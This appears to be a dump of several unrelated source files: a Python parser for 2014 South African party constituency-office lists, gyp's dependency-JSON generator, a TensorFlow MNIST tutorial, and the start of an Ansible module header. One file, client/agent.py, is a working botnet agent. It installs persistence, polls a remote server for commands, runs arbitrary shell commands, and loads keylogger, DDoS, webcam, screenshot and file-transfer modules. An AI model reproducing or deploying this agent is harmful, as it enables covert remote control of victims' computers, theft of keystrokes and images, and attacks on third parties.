'Stand No 4065, Mathibestad, 0404': 'Moretele ,Mathibestad Str,Hammanskraal 0404',
'Shop No.2, Mphiwe Family Complex, 1360': 'Mphiwe Family Trust Complex Main Road, Acornhoek 1360',
'D 254, Solomon Section, Main Road Mpuluzi, 2335': 'Mpuluzi, 2335, Mpumalanga South Africa',
'Mabogo General Dealer, No 40, Ha Ravele, next to Ravele Bar Lounge and Nengovhela, Tshilwavhusiku,0920': 'Nengovhela Tshilwavhusiku, Limpopo 0920',
'Stand 408 A, Ngwenyeni Main Road, KaMaqhekeza, 1346': 'Nkomazi, Mpumalanga, 1346',
'PE Northern Areas': 'Salt Lake, Port Elizabeth',
'Valoyi Traditional Authority Trust, Runnymead Trading Centre, Nwamitwa, 0871': 'Nwamitwa, 0871, Limpopo South Africa',
'Ipelegeng Com. Centre, Cnr Phera & Khumalo White City Jabavu, 1868': 'Phera & Khumalo White City Jabavu, 1868',
'597 Block H, Sekhing Village, near SASA Offices, 8566': 'Sekhing, Greater Taung Sekhing 8566',
'Matsamo Lake Beneficiary Building,Shongwe Mission,1331': 'Shongwe Mission, 1331',
'Shop No.1, Smiling Park, Mamotintane, next to the Stadium, Houtbos, Mankweng': 'Smiling Park Mankweng, Limpopo South Africa',
'Oakley Trust, Stand 626, Mathibela Traditional Authority': 'Stand 620, Zone 1, Mankweng Polkwane 0727',
'Pretelis Building, 6 Tambotie Street, Phalaborwa, 1398': 'Tambotie Street, Phalaborwa, 1398, Limpopo South Africa',
'93 Lesedi Building, Main Road, Taung Station, 8580': 'Taung Station, North West 8580',
'The Oaks Village Next to the Community Hall , 1390': 'The Oaks Village Next to the Community Hall , 1390',
'Stand No 12 Far East, Tonga Road, Kwalugedlane, 1341': 'Tonga, Kwalugedlane, Komatipooort, 1341',
'Sotobe Car Wash Premises, Tugela Ferry Main Rod opposite Msinga Municipality, Msinga, 3010': 'Tugela Ferry Rd, 3010',
'Room 102 Union Rd Counsel Offices, Evaton, 2845': 'Union Rd, Evaton 2845',
'No 09 Victoria Street, Build It Building, 2745': 'Victoria Rd Mahikeng 2745',
'1375 The Village Mall, Stand No.1375, Elukwatini, 1192': 'village mall Elukwatini, 1192 City of Mpumalanga',
'Shop No. 19, Kliptown Taxi Rank, Walter Sisulu Square, Kliptown, 1811': 'Walter Sisulu Square, Kliptown, Soweto 1811',
'7450 Zwelitsha Street, Zone 1Diepkloof, 1864': 'Zone 1, Diepkloof, 1864 ',
'11 Black Seed Centre, 2134 Zwane Street, Mbalentle, 2285': 'Zwane Street, Mbalentle, 2285',
'No. 3 Setlagole Shopping Complex, Vryburg Road (N18), Setlagole Village, 2772': 'Vryburg Road, Ratlou, 2772',
'53 Parakiet Street, Pescodia, Kimberly, 8309': '53 Parakiet Street, Kimberly, 8309',
'Deep South': 'Fish Hoek',
'45 main Street, Kirkwood, 6120': 'Kirkwood',
'4 Thirteen Street Delaray, Roodepoort, 1724': 'No. 4 13th Street Delaray'
}
def process_anc_province(text, province):
source_urls = {
'Eastern Cape': 'http://sourceafrica.net/documents/15394-anc-constituency-offices-eastern-cape-2014.html',
'Free State': 'http://sourceafrica.net/documents/15395-anc-constituency-offices-free-state-2014.html',
'Gauteng': 'http://sourceafrica.net/documents/15396-anc-constituency-offices-gauteng-2014.html',
'Kwazulu Natal': 'http://sourceafrica.net/documents/15397-anc-constituency-offices-kwazulu-natal-2014.html',
'Limpopo': 'http://sourceafrica.net/documents/15398-anc-constituency-offices-limpopo-2014.html',
'Mpumalanga': 'http://sourceafrica.net/documents/15399-anc-constituency-offices-mpumalanga-2014.html',
'North West': 'http://sourceafrica.net/documents/15400-anc-constituency-offices-north-west-2014.html',
'Northern Cape': 'http://sourceafrica.net/documents/15401-anc-constituency-offices-northern-cape-2014.html',
'Western Cape': 'http://sourceafrica.net/documents/15402-anc-constituency-offices-western-cape-2014.html'
}
source_url = source_urls[province]
source_note = 'ANC %s Constituency List 2014' % (province)
correct_title = {
'ATLANTIS, MAMRE, PELLA,SURROUNDING FARMS': 'ATLANTIS, MAMRE, PELLA, SURROUNDING FARMS',
'SENWABARWANA(BLOUBERG)': 'SENWABARWANA (BLOUBERG)'
}
offices = []
title_pattern = " *([0-9]*)\.?\W*PCO CODE\W*([0-9]+) *([A-Za-z0-9,()/' ]+)"
fields = [
'MP',
'Cell',
'Administrator',
'Physical Address',
'Tel No',
'Tel',
'Fax No',
'Fax',
'E-mail',
'Email',
'Ward',
'Municipality',
'Region',
'Postal Address',
'Volunteer',
'MPL',
'Physical address',
'Postal address',
'Telefax',
'Telfax',
'Faxemail',
'Wards',
'Physical & Postal Address',
'Tell',
'ADSL',
'Caucus Cell Phone'
]
match_fields = ' *(?P<field>(' + ')|('.join(fields) + '))\W+(?P<value>.+)'
correct_fields = {
'Email': 'E-mail',
'Telefax': 'Telfax',
'Faxemail': 'Fax',
'Wards': 'Ward',
'Tell': 'Tel',
'Tel No': 'Tel',
'Fax No': 'Fax',
}
add_office = None
previous_field = None
set_next_cell = True
for line in text.split("\n"):
match_title = re.match(title_pattern, line)
if match_title:
#new office
if add_office:
if 'Physical Address' in add_office:
corrected = manual_location_corrections.get(
add_office['Physical Address'],
None)
if corrected:
add_office['Location'] = corrected
offices.append(add_office)
add_office = None
title = match_title.group(3)
title = title.replace('(to be relocated)', '')
title = title.replace('(RELOCATED)', '')
title = title.replace('(Office Is Relocating)', '')
title = title.strip()
title = correct_title.get(title, title)
title = title.title()
title = title.replace("'S", "'s")
pco_code = match_title.group(2)
add_office = {
'Title': 'ANC Constituency Office (%s): %s' % (pco_code, title),
'Province': province,
'Type': 'office',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'ANC'
}
add_office['People'] = []
if pco_code != '000':
add_office['identifiers'] = {
'constituency-office/ANC/': pco_code
}
elif add_office:
match_field = re.match(match_fields, line)
if match_field:
field = match_field.group('field').strip().title()
value = match_field.group('value').strip()
field = correct_fields.get(field, field)
value = value.replace(u'Â', '')
value = value.replace(u' ', ' ')
value = value.replace(u'–', '-')
value = value.replace(u'–', '-')
prev = ['Physical Address', 'Postal Address', 'Ward']
notin = ['Postal Address', 'Tel', 'Fax', 'E-mail', 'Ward', 'Municipality', 'Region']
if field in ['Mp', 'Mpl']:
if 'Awaiting deployment' in value:
set_next_cell = False
continue
name = value
name = re.sub('-? ?(Deputy )?(Minister|NCOP)', '', name)
name = name.replace('Hon ', '')
name = name.replace('Dr ', '')
name = name.replace('Dep-Min. ', '')
name = name.replace('Min. ', '')
name = name.replace(' (Provincial)', '')
name = name.replace(' (NEC member)', '')
name = re.sub(
'-? ?\(? ?(Province to National) ?\)?',
'',
name
)
name = re.sub(
'–?-? NEC Deployee( &| and)?( Deputy)?( Minister)?',
'',
name
)
name = name.strip()
original_name = name
name = manual_name_corrections.get(name, name)
set_next_cell = True
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
add_office['People'].append(person_to_append)
elif field == 'Volunteer':
add_office['People'].append({
'Name': value.replace(',', ''),
'Position': 'Volunteer'
})
elif field == 'Administrator':
name = value
name = manual_name_corrections.get(name, name)
name = name.replace(',', '').replace('/', '').strip()
position = 'Administrator'
#ignore vacancies
if 'Vacant' in name:
set_next_cell = False
continue
#correctly label volunteer administrators
if '(Volunteer)' in value:
name = name.replace('(Volunteer)', '').strip()
position = 'Administrator (volunteer)'
set_next_cell = True
add_office['People'].append({
'Name': name,
'Position': position
})
elif field == 'Cell':
#cell is only recorded with the previous person
if len(add_office['People']) > 0 and set_next_cell:
#remove odd unicode characters in cell numbers
value = re.sub('\W', ' ', value)
person_index = len(add_office['People'])-1
add_office['People'][person_index][field] = value
elif field == 'Physical & Postal Address':
#split combined field into two
add_office['Postal Address'] = value
add_office['Physical Address'] = value
elif field == 'Telfax':
#split combined field into two
add_office['Tel'] = value
add_office['Fax'] = value
else:
#field for the office/area
add_office[field] = value
previous_field = field
#handle combined fields that span more than one line
elif previous_field == 'Physical & Postal Address':
add_office['Postal Address'] = add_office['Postal Address'] + ' ' + value
add_office['Physical Address'] = add_office['Physical Address'] + ' ' +value
#handle fields that span more than one line
elif previous_field in prev and not line.strip() in notin:
add_office[previous_field] = add_office[previous_field] + ' ' + line.strip()
elif line.strip() != '':
print 'Unmatched line:', line
if 'Physical Address' in add_office:
corrected = manual_location_corrections.get(add_office['Physical Address'], None)
if corrected:
add_office['Location'] = corrected
offices.append(add_office)
return offices
def process_da_areas(csv_file):
areas = {}
source_url = 'http://sourceafrica.net/documents/15403-da-constituency-areas-2014.html'
source_note = 'DA Constituency List 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[2].strip() in areas:
#area already exists - just add the person
original_name = row[1]
name = manual_name_corrections.get(row[1], row[1])
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'}
if name != original_name:
person_to_append['Alternative Name'] = original_name
areas[row[2].strip()]['People'].append(person_to_append)
else:
#add new area
original_name = row[1]
name = manual_name_corrections.get(row[1], row[1])
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'}
if name != original_name:
person_to_append['Alternative Name'] = original_name
areas[row[2].strip()] = {
'Title': row[2].strip(),
'People': [
person_to_append
],
'Description': row[5],
'Province': row[4],
'Type': 'area',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'DA'
}
if row[3] != '':
areas[row[2].strip()]['Location'] = manual_location_corrections.get(row[3], row[3])
return areas.values()
def process_eff_offices(csv_file):
offices_to_add = {}
source_url = 'http://sourceafrica.net/documents/15405-eff-constituency-offices-2014.html'
source_note = 'EFF Constituency List 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[0].strip() in offices_to_add:
#office exists - just add person
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
offices_to_add[row[0].strip()]['People'].append(person_to_append)
else:
#add new office
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
offices_to_add[row[0].strip()] = {
'Title': row[0].strip(),
'People': [
person_to_append
],
'Tel': row[5],
'Province': row[2].title(),
'Physical Address': manual_location_corrections.get(row[3], row[3]).title(),
'Type': 'office',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'EFF'
}
if row[4] != '':
administrator_to_append = {
'Name': row[4].title(),
'Position': 'Administrator'
}
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
return offices_to_add.values()
def process_aic_offices(csv_file):
offices_to_add = {}
source_url_1 = 'http://sourceafrica.net/documents/15404-aic-constituencies-offices-2014.html'
source_note_1 = 'AIC Constituency List 2014'
source_url_2 = 'http://sourceafrica.net/documents/15406-pmg-sourced-constituency-office-data.html'
source_note_2 = 'Constituency data collected by PMG 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[0].strip() in offices_to_add:
#office exists - just add person
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()]['People'].append(person_to_append)
else:
#add new office
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()] = {
'Title': row[0].strip(),
'People': [],
'Tel': row[6],
'Fax': row[7],
'Province': row[5],
'Physical Address': manual_location_corrections.get(row[4], row[4]),
'Type': 'office',
'Sources': [
{
'Source URL': source_url_1,
'Source Note': source_note_1
},
{
'Source URL': source_url_2,
'Source Note': source_note_2
},
],
'Party': 'AIC'
}
if name != '':
offices_to_add[row[0].strip()]['People'].append(person_to_append)
if row[8] != '':
administrator_to_append = {
'Name': row[8],
'Position': 'Administrator'
}
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
if row[9] != '':
administrator_to_append = {
'Name': row[9],
'Position': 'Coordinator'
}
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
if row[10] != '':
administrator_to_append = {
'Name': row[10],
'Position': 'Community Development Field Worker'
}
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
return offices_to_add.values()
def process_acdp_offices(csv_file):
offices_to_add = {}
source_url = 'http://sourceafrica.net/documents/15406-pmg-sourced-constituency-office-data.html'
source_note = 'Constituency data collected by PMG 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[0].strip() in offices_to_add:
#office exists - just add person
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()]['People'].append(person_to_append)
else:
#add new office
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()] = {
'Title': row[0].strip(),
'People': [],
'Tel': row[6],
'Fax': row[7],
'Province': row[5],
'Physical Address': manual_location_corrections.get(row[4], row[4]),
'Type': 'office',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'ACDP'
}
if name != '':
offices_to_add[row[0].strip()]['People'].append(person_to_append)
if row[8] != '':
administrator_to_append = {
'Name': row[8],
'Position': 'Administrator'
}
if row[9] != '':
administrator_to_append['Cell'] = row[9]
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
return offices_to_add.values()
def process_ff_offices(csv_file):
offices_to_add = {}
source_url = 'http://sourceafrica.net/documents/15406-pmg-sourced-constituency-office-data.html'
source_note = 'Constituency data collected by PMG 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[0].strip() in offices_to_add:
#office exists - just add person
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()]['People'].append(person_to_append)
else:
#add new office
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()] = {
'Title': row[0].strip(),
'People': [],
'Tel': row[6],
'Fax': row[7],
'Province': row[5],
'Physical Address': manual_location_corrections.get(row[4], row[4]),
'Type': 'office',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'FF'
}
if name != '':
offices_to_add[row[0].strip()]['People'].append(person_to_append)
if row[8] != '':
administrator_to_append = {
'Name': row[8],
'Position': 'Administrator'
}
if row[9] != '':
administrator_to_append['Cell'] = row[9]
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
return offices_to_add.values()
def process_apc_offices(csv_file):
offices_to_add = {}
source_url = 'http://sourceafrica.net/documents/15406-pmg-sourced-constituency-office-data.html'
source_note = 'Constituency data collected by PMG 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[0].strip() in offices_to_add:
#office exists - just add person
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()]['People'].append(person_to_append)
else:
#add new office
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()] = {
'Title': row[0].strip(),
'People': [],
'Tel': row[6],
'Fax': row[7],
'Province': row[5],
'Physical Address': manual_location_corrections.get(row[4], row[4]),
'Type': 'office',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'APC'
}
if name != '':
offices_to_add[row[0].strip()]['People'].append(person_to_append)
if row[8] != '':
administrator_to_append = {
'Name': row[8],
'Position': 'Administrator'
}
if row[9] != '':
administrator_to_append['Cell'] = row[9]
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
return offices_to_add.values()
def process_udm_offices(csv_file):
offices_to_add = {}
source_url = 'http://sourceafrica.net/documents/15406-pmg-sourced-constituency-office-data.html'
source_note = 'Constituency data collected by PMG 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[0].strip() in offices_to_add:
#office exists - just add person
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()]['People'].append(person_to_append)
else:
#add new office
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()] = {
'Title': row[0].strip(),
'People': [],
'Tel': row[6],
'Fax': row[7],
'Province': row[5],
'Physical Address': manual_location_corrections.get(row[4], row[4]),
'Type': 'office',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'UDM'
}
if name != '':
offices_to_add[row[0].strip()]['People'].append(person_to_append)
if row[8] != '':
administrator_to_append = {
'Name': row[8],
'Position': 'Administrator'
}
if row[9] != '':
administrator_to_append['Cell'] = row[9]
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
return offices_to_add.values()
ensure_executable_found("antiword")
provinces = [
'Eastern Cape',
'Free State',
'Gauteng',
'Kwazulu Natal',
'Limpopo',
'Mpumalanga',
'North West',
'Northern Cape',
'Western Cape'
]
offices = [
office
for province in provinces
for office in process_anc_province(
check_output(
['antiword', '2014/ANC/'+province+'.doc']
).decode('unicode-escape'),
province
)
]
offices += \
process_da_areas('2014/DA_processed.csv') + \
process_eff_offices('2014/EFF_processed.csv') + \
process_aic_offices('2014/AIC_processed.csv') + \
process_acdp_offices('2014/ACDP_processed.csv') + \
process_ff_offices('2014/FFplus_processed.csv') + \
process_apc_offices('2014/APC_processed.csv') + \
process_udm_offices('2014/UDM_processed.csv')
exclude = [
'COPE'
]
json_output = {
'offices': offices,
'exclude': exclude,
'start_date': '2014-05-21',
'end_date': '2014-05-06'}
with open('2014.json', 'w') as output:
json.dump(json_output, output, indent=4)
| agpl-3.0 |
datakid/hh2014-epilepsy | client_src/epilepsy-project/node_modules/ember-cli/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/dump_dependency_json.py | 899 | 2768 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import os
import gyp
import gyp.common
import gyp.msvs_emulation
import json
import sys
generator_supports_multiple_toolsets = True
generator_wants_static_library_dependencies_adjusted = False
generator_default_variables = {
}
for dirname in ['INTERMEDIATE_DIR', 'SHARED_INTERMEDIATE_DIR', 'PRODUCT_DIR',
'LIB_DIR', 'SHARED_LIB_DIR']:
# Some gyp steps fail if these are empty(!).
generator_default_variables[dirname] = 'dir'
for unused in ['RULE_INPUT_PATH', 'RULE_INPUT_ROOT', 'RULE_INPUT_NAME',
'RULE_INPUT_DIRNAME', 'RULE_INPUT_EXT',
'EXECUTABLE_PREFIX', 'EXECUTABLE_SUFFIX',
'STATIC_LIB_PREFIX', 'STATIC_LIB_SUFFIX',
'SHARED_LIB_PREFIX', 'SHARED_LIB_SUFFIX',
'CONFIGURATION_NAME']:
generator_default_variables[unused] = ''
def CalculateVariables(default_variables, params):
generator_flags = params.get('generator_flags', {})
for key, val in generator_flags.items():
default_variables.setdefault(key, val)
default_variables.setdefault('OS', gyp.common.GetFlavor(params))
flavor = gyp.common.GetFlavor(params)
if flavor =='win':
# Copy additional generator configuration data from VS, which is shared
# by the Windows Ninja generator.
import gyp.generator.msvs as msvs_generator
generator_additional_non_configuration_keys = getattr(msvs_generator,
'generator_additional_non_configuration_keys', [])
generator_additional_path_sections = getattr(msvs_generator,
'generator_additional_path_sections', [])
gyp.msvs_emulation.CalculateCommonVariables(default_variables, params)
def CalculateGeneratorInputInfo(params):
"""Calculate the generator specific info that gets fed to input (called by
gyp)."""
generator_flags = params.get('generator_flags', {})
if generator_flags.get('adjust_static_libraries', False):
global generator_wants_static_library_dependencies_adjusted
generator_wants_static_library_dependencies_adjusted = True
def GenerateOutput(target_list, target_dicts, data, params):
# Map of target -> list of targets it depends on.
edges = {}
# Queue of targets to visit.
targets_to_visit = target_list[:]
while len(targets_to_visit) > 0:
target = targets_to_visit.pop()
if target in edges:
continue
edges[target] = []
for dep in target_dicts[target].get('dependencies', []):
edges[target].append(dep)
targets_to_visit.append(dep)
filename = 'dump.json'
f = open(filename, 'w')
json.dump(edges, f)
f.close()
print 'Wrote json to %s.' % filename
| mit |
palanglois/augmentedReality | testTensorFlow/MNIST.py | 1 | 3453 | #!/usr/bin/python
#Load matplotlib
import matplotlib.pyplot as plt
plt.style.use('ggplot')
#Loading the mnist data
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('MNIST_data', one_hot=True)
#Import tensor flow
import tensorflow as tf
sess = tf.InteractiveSession()
#Allocating sizes for the images
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, 10])
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
#Defining the convolution
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
#Defining the max-pooling
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
### LAYER 1 ###
#Defining the first convolutional layer
W_conv1 = weight_variable([5, 5, 1, 32])
b_conv1 = bias_variable([32])
#Resizing the pictures
x_image = tf.reshape(x, [-1,28,28,1])
#Defining the operations in the first layer
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
### LAYER 2 ###
#Defining the second convolutioinal layer
W_conv2 = weight_variable([5, 5, 32, 64])
b_conv2 = bias_variable([64])
#Defining the operations in the second layer
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
### LAYER 3 ###
#Defining the third layer which is fully connected
W_fc1 = weight_variable([7 * 7 * 64, 1024])
b_fc1 = bias_variable([1024])
#Defining the operations in the third layer
h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
#Performing dropout
keep_prob = tf.placeholder(tf.float32) #Proba to keep a neuron's output
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
### LAYER 4 ###
#Defining the fourth layer which is just a soft max
W_fc2 = weight_variable([1024, 10])
b_fc2 = bias_variable([10])
#Defining the operations in the fourth layer
y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
#Using cross-entropy as a loss function
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(y_conv, y_))
#Defining the learning rate
learningRate = 1e-4
#Training
train_step = tf.train.AdamOptimizer(learningRate).minimize(cross_entropy)
#Determining the number of correct predictions
correct_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))
#Averaging the number of correct predictions
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
#Performing the initialization in the back-end
sess.run(tf.global_variables_initializer())
#Doing 1000 training steps
iterations = []
for i in range(2000):
batch = mnist.train.next_batch(50)
train_accuracy = accuracy.eval(feed_dict={
x:batch[0], y_: batch[1], keep_prob: 1.0})
print("step %d, training accuracy %g"%(i, train_accuracy))
_, loss_val = sess.run([train_step,cross_entropy], feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
iterations.append(loss_val)
plt.plot(iterations)
plt.show()
#Number of correct prediction
correct_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print(accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
| gpl-3.0 |
EzLucky/Wares | client/agent.py | 1 | 3066 | import time
import os
import requests
import sys
import platform
import socket
import random
import string
import settings
import utils
from modules import runcmd
from modules import persistence
from modules import download
from modules import upload
from modules import screenshot
from modules import ddos
from modules import keylogger
from modules import webcam
MODULES = ['runcmd', 'persistence', 'download', 'upload', 'screenshot', 'ddos', 'keylogger', 'webcam']
if not settings.BOT_ID:
settings.BOT_ID = "AGENT-"+socket.gethostname()
if not utils.validate_botid(settings.BOT_ID):
settings.BOT_ID = "AGENT-"+''.join(random.choice(string.ascii_letters) for _ in range(5))
def print_help(mod=None):
help_text = "Loaded modules:\n"
if mod is None:
for module in MODULES:
help_text += "- " + module + "\n"
help_text += sys.modules["modules." + module].help()
help_text += """
General commands:
- cd path/to/dir : changes directory
- help : display this text
- [any other command] : execute shell command
"""
else:
help_text = "- " + mod + "\n"
help_text += sys.modules["modules.%s" % mod].help()
utils.send_output(help_text)
if __name__ == "__main__":
time.sleep(settings.PAUSE_AT_START)
if settings.AUTO_PERSIST:
persistence.install()
last_active = time.time()
is_idle = False
is_IDLE = False
while 1:
if is_IDLE:
# sleep 2min (REQUEST_INTERVAL = 5)
time.sleep(settings.REQUEST_INTERVAL * 24)
elif is_idle:
# sleep 30s (REQUEST_INTERVAL = 5)
time.sleep(settings.REQUEST_INTERVAL * 6)
else:
# sleep 5s (REQUEST_INTERVAL = 5)
time.sleep(settings.REQUEST_INTERVAL)
try:
command = requests.get(settings.SERVER_URL + "/api/pop?botid=" + settings.BOT_ID + "&sysinfo=" + platform.system() + " " + platform.release()).text
cmdargs = command.split(" ")
if command:
if settings.DEBUG:
print command
if cmdargs[0] == "cd":
os.chdir(os.path.expandvars(" ".join(cmdargs[1:])))
elif cmdargs[0] in MODULES:
sys.modules["modules.%s" % cmdargs[0]].run(*cmdargs[1:])
elif cmdargs[0] == "help":
if len(cmdargs) > 1:
print_help(cmdargs[1])
else:
print_help()
else:
runcmd.run(command)
last_active = time.time()
is_idle = False
is_IDLE = False
elif time.time() - last_active > (settings.IDLE_TIME*5):
# if 10min of inactivity go IDLE
is_IDLE = True
elif time.time() - last_active > settings.IDLE_TIME:
# if 2min of inactivity go idle
is_idle = True
except Exception, exc:
is_idle = True
utils.send_output(exc)
if settings.DEBUG:
print exc
| mit |
gaddman/ansible | lib/ansible/modules/cloud/google/gcp_compute_forwarding_rule.py | 7 | 25717 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
